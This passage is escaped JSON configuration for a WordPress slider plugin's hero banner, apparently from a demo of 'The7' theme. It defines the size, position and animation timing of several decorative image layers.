18\",\"alias\":\"3r\",\"uid\":18,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2016\\/11\\/3-r.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"907px\",\"e\":true},\"n\":{\"v\":\"907px\"},\"t\":{\"v\":\"907px\"},\"m\":{\"v\":\"907px\"}},\"height\":{\"d\":{\"v\":\"420px\",\"e\":true},\"n\":{\"v\":\"420px\"},\"t\":{\"v\":\"420px\"},\"m\":{\"v\":\"420px\"}},\"originalWidth\":907,\"originalHeight\":420,\"aspectRatio\":{\"d\":{\"v\":2.1595238095238},\"n\":{\"v\":2.1595238095238},\"t\":{\"v\":2.1595238095238},\"m\":{\"v\":2.1595238095238}}},\"position\":{\"x\":{\"d\":{\"v\":\"-239px\",\"e\":true},\"n\":{\"v\":\"-239px\"},\"t\":{\"v\":\"-239px\"},\"m\":{\"v\":\"-239px\"}},\"y\":{\"d\":{\"v\":\"-35px\",\"e\":true},\"n\":{\"v\":\"-35px\"},\"t\":{\"v\":\"-35px\"},\"m\":{\"v\":\"-35px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0.14\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"6\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"15\":{\"text\":\"Image 15\",\"alias\":\"3l\",\"uid\":15,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/2016\\/11\\/l-3.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"1264px\",\"e\":true},\"n\":{\"v\":\"1264px\"},\"t\":{\"v\":\"1264px\"},\"m\":{\"v\":\"1264px\"}},\"height\":{\"d\":{\"v\":\"718px\",\"e\":true},\"n\":{\"v\":\"718px\"},\"t\":{\"v\":\"718px\"},\"m\":{\"v\":\"718px\"}},\"originalWidth\":1264,\"originalHeight\":718,\"aspectRatio\":{\"d\":{\"v\":1.7604456824513},\"n\":{\"v\":1.7604456824513},\"t\":{\"v\":1.7604456824513},\"m\":{\"v\":1.7604456824513}}},\"position\":{\"x\":{\"d\":{\"v\":\"-278px\",\"e\":true},\"n\":{\"v\":\"-278px\"},\"t\":{\"v\":\"-278px\"},\"m\":{\"v\":\"-278px\"}},\"y\":{\"d\":{\"v\":\"-195px\",\"e\":true},\"n\":{\"v\":\"-195px\"},\"t\":{\"v\":\"-195px\"},\"m\":{\"v\":\"-195px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":600},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0.14\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":600,\"startRelative\":600},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7400,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"6\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"14\":{\"text\":\"Image 14\",\"alias\":\"2l\",\"uid\":14,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/2-l-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"666px\",\"e\":true},\"n\":{\"v\":\"666px\"},\"t\":{\"v\":\"666px\"},\"m\":{\"v\":\"666px\"}},\"height\":{\"d\":{\"v\":\"873px\",\"e\":true},\"n\":{\"v\":\"873px\"},\"t\":{\"v\":\"873px\"},\"m\":{\"v\":\"873px\"}},\"originalWidth\":666,\"originalHeight\":873,\"aspectRatio\":{\"d\":{\"v\":0.76288659793814},\"n\":{\"v\":0.76288659793814},\"t\":{\"v\":0.76288659793814},\"m\":{\"v\":0.76288659793814}}},\"position\":{\"x\":{\"d\":{\"v\":\"33px\",\"e\":true},\"n\":{\"v\":\"33px\"},\"t\":{\"v\":\"33px\"},\"m\":{\"v\":\"33px\"}},\"y\":{\"d\":{\"v\":\"-142px\",\"e\":true},\"n\":{\"v\":\"-142px\"},\"t\":{\"v\":\"-142px\"},\"m\":{\"v\":\"-142px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":7,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":7,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":450},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"-100px\"},\"n\":{\"v\":\"-100px\"},\"t\":{\"v\":\"-100px\"},\"m\":{\"v\":\"-100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7550,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"4\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"17\":{\"text\":\"Image 17\",\"alias\":\"2r\",\"uid\":17,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/2-r-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"958px\",\"e\":true},\"n\":{\"v\":\"958px\"},\"t\":{\"v\":\"958px\"},\"m\":{\"v\":\"958px\"}},\"height\":{\"d\":{\"v\":\"823px\",\"e\":true},\"n\":{\"v\":\"823px\"},\"t\":{\"v\":\"823px\"},\"m\":{\"v\":\"823px\"}},\"originalWidth\":958,\"originalHeight\":823,\"aspectRatio\":{\"d\":{\"v\":1.1640340218712},\"n\":{\"v\":1.1640340218712},\"t\":{\"v\":1.1640340218712},\"m\":{\"v\":1.1640340218712}}},\"position\":{\"x\":{\"d\":{\"v\":\"-135px\",\"e\":true},\"n\":{\"v\":\"-135px\"},\"t\":{\"v\":\"-135px\"},\"m\":{\"v\":\"-135px\"}},\"y\":{\"d\":{\"v\":\"-193px\",\"e\":true},\"n\":{\"v\":\"-193px\"},\"t\":{\"v\":\"-193px\"},\"m\":{\"v\":\"-193px\"}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\"},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\"}},\"zIndex\":8,\"position\":\"relative\"},\"behavior\":{\"intelligentInherit\":false,\"baseAlign\":\"slide\"},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":450},{\"id\":\"frame_999\",\"start\":9000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"y\":{\"d\":{\"v\":\"100px\"},\"n\":{\"v\":\"100px\"},\"t\":{\"v\":\"100px\"},\"m\":{\"v\":\"100px\"}},\"z\":\"0\",\"scaleX\":\"0.9\",\"scaleY\":\"0.9\",\"opacity\":\"0\",\"rotationX\":\"0\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"top\"},\"n\":{\"v\":\"top\"},\"t\":{\"v\":\"top\"},\"m\":{\"v\":\"top\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"ease\":\"power2.out\",\"speed\":1000,\"start\":450,\"startRelative\":450},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"ease\":\"power3.inOut\",\"start\":9000,\"startRelative\":7550,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"effects\":{\"parallax\":\"4\"},\"idle\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"Open Sans\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"v\":\"rgba(255, 255, 255, 1)\",\"e\":true},\"n\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"t\":{\"v\":\"rgba(255, 255, 255, 1)\"},\"m\":{\"v\":\"rgba(255, 255, 255, 1)\"}}}},\"hover\":{\"color\":\"rgba(255, 255, 255, 1)\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\",\"ease\":\"none\",\"svg\":{\"color\":\"rgba(255, 255, 255, 1)\"}},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false,\"t\":false},\"type\":\"image\",\"version\":\"6.4.0\"},\"13\":{\"text\":\"Image 13\",\"alias\":\"1l\",\"uid\":13,\"media\":{\"imageUrl\":\"https:\\/\\/the7.io\\/wp-content\\/uploads\\/sites\\/84\\/revslider\\/the7-landing-hero-image\\/l-1-tiny.png\"},\"size\":{\"width\":{\"d\":{\"v\":\"924px\",\"e\":true},\"n\":{\"v\":\"924px\"},\"t\":{\"v\":\"924px\"},\"m\":{\"v\":\"924px\"}},\"height\":{\"d\":{\"v\":\"1003px\",\"e\":true},\"n\":{\"v\":\"1003px\"},\"t\":{\"v\":\"1003px\"},\"m\":{\"v\":\"1003px\"}},\"originalWidth\":924,\"originalHeight\":1003,\"aspectRatio\":{\"d\":{\"v\":0.92123629112662},\"n\":{\"v\":0.92123629112662},\"t\":{\"v\":0.92123629112662},\"m\":{\"v\":0.92123629112662}}},\"position\":{\"x\":{\"d\":{\"v\":\"-154px\",\"e\":true},\"n\":{\"v\":\"-154px\"},\"t\":{\"v\":\"-15